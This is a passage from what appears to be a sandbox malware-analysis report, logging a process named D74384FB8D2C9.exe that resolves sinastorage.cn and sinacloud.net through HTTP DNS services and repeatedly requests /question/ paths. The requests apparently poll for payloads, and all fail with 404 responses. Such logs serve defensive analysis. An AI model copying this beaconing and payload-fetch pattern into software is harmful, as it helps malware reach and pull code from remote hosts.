                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                33 | 192.168.2.5 | 49799 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:44.915756941 CET | 87 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960834980 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                34 | 192.168.2.5 | 49798 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:44.915976048 CET | 87 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960572958 CET | 114 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                35 | 192.168.2.5 | 49805 | 49.7.37.97 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:25:46.463459015 CET | 237 | OUT | GET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:48.021922112 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:47 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 34f09294-2412-0521-2547-6c92bfce66de
                                                                                x-error-code: NoSuchBucket
Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>34f09294-2412-0521-2547-6c92bfce66de</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49806 | 49.7.37.97 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:46.463852882 CET | 245 | OUT | GET /question/2024-12-05/21_22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.cn
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:48.036273956 CET | 536 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22061420-1acaf9b
Date: Thu, 05 Dec 2024 13:25:47 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 345c5bc1-2412-0521-2547-0894eff93894
x-error-code: NoSuchBucket
Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>345c5bc1-2412-0521-2547-0894eff93894</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49809 | 123.126.45.208 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:48.165139914 CET | 233 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.com
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:49.741013050 CET | 523 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22061420-1acaf9b
Date: Thu, 05 Dec 2024 13:25:49 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 32eda46f-2412-0521-2549-b4055d752c2c
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>32eda46f-2412-0521-2549-b4055d752c2c</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49815 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:49.872381926 CET | 233 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.com
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:54.440876961 CET | 523 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22061420-1acaf9b
Date: Thu, 05 Dec 2024 13:25:54 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 2c86cd27-2412-0521-2554-5ca7213e02e6
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>2c86cd27-2412-0521-2554-5ca7213e02e6</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49827 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:54.906795979 CET | 232 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.cn
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:57.042303085 CET | 523 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22061420-1acaf9b
Date: Thu, 05 Dec 2024 13:25:56 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 76c934d1-2412-0521-2556-5ca7213e04cc
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>76c934d1-2412-0521-2556-5ca7213e04cc</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49833 | 49.7.37.97 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:57.169873953 CET | 232 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinastorage.cn
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:25:58.726234913 CET | 523 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.6.0 r22080916-2b967e2
Date: Thu, 05 Dec 2024 13:25:58 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: c02a0fea-2412-0521-2558-0894eff93358
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>c02a0fea-2412-0521-2558-0894eff93358</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49837 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:25:59.101828098 CET | 231 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:04.150521040 CET | 499 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:25:54 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 35eef701-2412-0521-2603-6c92bfce6724
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>35eef701-2412-0521-2603-6c92bfce6724</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49846 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:02.286087990 CET | 87 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
User-Agent: D74384FB8D2C9
Host: 114.114.114.114


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49850 | 27.221.16.179 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:04.282144070 CET | 231 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:06.148055077 CET | 499 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:26:03 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 3461c14b-2412-0521-2605-0894eff939cc
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>3461c14b-2412-0521-2605-0894eff939cc</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49854 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:05.551978111 CET | 87 | OUT | GET /d?dn=sinastorage.cn HTTP/1.1
User-Agent: D74384FB8D2C9
Host: 114.114.114.114


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49857 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:06.277710915 CET | 231 | OUT | GET /question/vc8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:08.225368977 CET | 499 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:25:59 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 74772b1b-2412-0521-2607-047bcb4b651c
x-error-code: NoSuchBucket
Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>74772b1b-2412-0521-2607-047bcb4b651c</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.54986227.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:08.349941969 CET231OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:10.089207888 CET | Bytes transferred: 499 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:07 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 5a8ef9de-2412-0521-2609-6c92bfce66fe
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>5a8ef9de-2412-0521-2609-6c92bfce66fe</RequestId></Error>0


                                                                                Session ID: 47 | Source IP: 192.168.2.5 | Source Port: 49879 | Destination IP: 123.126.45.208 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:15.859374046 CET | Bytes transferred: 237 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:17.393886089 CET | Bytes transferred: 527 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22080916-2b967e2
                                                                                Date: Thu, 05 Dec 2024 13:26:17 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: c02a2939-2412-0521-2617-0894eff93358
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>c02a2939-2412-0521-2617-0894eff93358</RequestId></Error>0


                                                                                Session ID: 48 | Source IP: 192.168.2.5 | Source Port: 49883 | Destination IP: 183.60.95.221 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:17.521855116 CET | Bytes transferred: 237 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:19.079374075 CET | Bytes transferred: 527 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 2c86e030-2412-0521-2618-5ca7213e02e6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>2c86e030-2412-0521-2618-5ca7213e02e6</RequestId></Error>0


                                                                                Session ID: 49 | Source IP: 192.168.2.5 | Source Port: 49889 | Destination IP: 183.60.95.221 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:19.401590109 CET | Bytes transferred: 236 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:20.950156927 CET | Bytes transferred: 527 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c94694-2412-0521-2620-5ca7213e04cc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>76c94694-2412-0521-2620-5ca7213e04cc</RequestId></Error>0


                                                                                Session ID: 50 | Source IP: 192.168.2.5 | Source Port: 49892 | Destination IP: 119.29.29.29 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:21.080108881 CET | Bytes transferred: 80 | Direction: OUT | Data: GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Timestamp: Dec 5, 2024 14:26:22.302628040 CET | Bytes transferred: 114 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session ID: 51 | Source IP: 192.168.2.5 | Source Port: 49893 | Destination IP: 182.254.116.116 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:21.082573891 CET | Bytes transferred: 83 | Direction: OUT | Data: GET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116


                                                                                Session ID: 52 | Source IP: 192.168.2.5 | Source Port: 49898 | Destination IP: 49.7.37.97 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:22.428438902 CET | Bytes transferred: 236 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:26.970990896 CET | Bytes transferred: 527 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:26 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a99b11-2412-0521-2626-b4055d752a1d
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a99b11-2412-0521-2626-b4055d752a1d</RequestId></Error>0


                                                                                Session ID: 53 | Source IP: 192.168.2.5 | Source Port: 49909 | Destination IP: 27.221.16.149 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:27.235205889 CET | Bytes transferred: 235 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:29.016957045 CET | Bytes transferred: 503 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:19 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3528eba9-2412-0521-2628-6c92bfce66d4
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>3528eba9-2412-0521-2628-6c92bfce66d4</RequestId></Error>0


                                                                                Session ID: 54 | Source IP: 192.168.2.5 | Source Port: 49915 | Destination IP: 27.221.16.179 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:29.143914938 CET | Bytes transferred: 235 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:30.978671074 CET | Bytes transferred: 503 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:28 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 769b6110-2412-0521-2630-5ca7213e02f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>769b6110-2412-0521-2630-5ca7213e02f2</RequestId></Error>0


                                                                                Session ID: 55 | Source IP: 192.168.2.5 | Source Port: 49920 | Destination IP: 119.29.29.29 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:31.110945940 CET | Bytes transferred: 79 | Direction: OUT | Data: GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Timestamp: Dec 5, 2024 14:26:32.332231998 CET | Bytes transferred: 131 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session ID: 56 | Source IP: 192.168.2.5 | Source Port: 49922 | Destination IP: 114.114.114.114 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:31.111548901 CET | Bytes transferred: 82 | Direction: OUT | Data: GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session ID: 57 | Source IP: 192.168.2.5 | Source Port: 49921 | Destination IP: 182.254.116.116 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:31.111598969 CET | Bytes transferred: 82 | Direction: OUT | Data: GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Timestamp: Dec 5, 2024 14:26:32.876100063 CET | Bytes transferred: 131 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session ID: 58 | Source IP: 192.168.2.5 | Source Port: 49924 | Destination IP: 27.221.16.179 | Destination Port: 80 | PID: 5448 | Process: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp: Dec 5, 2024 14:26:32.694230080 CET | Bytes transferred: 235 | Direction: OUT | Data: GET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Timestamp: Dec 5, 2024 14:26:34.480926991 CET | Bytes transferred: 503 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:31 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a9dada-2412-0521-2634-b4055d752e03
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a9dada-2412-0521-2634-b4055d752e03</RequestId></Error>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49930 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 14:26:34.605550051 CET | 235 | OUT | GET /question/s6paies HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Host: sinacloud.net
Range: bytes=0-
Connection: Keep-Alive
Dec 5, 2024 14:26:36.456247091 CET | 503 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 13:26:27 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Requester: GRPS000000ANONYMOUSE
X-RequestId: 7671a9bf-2412-0521-2636-3868dd5cd1c8
x-error-code: NoSuchBucket
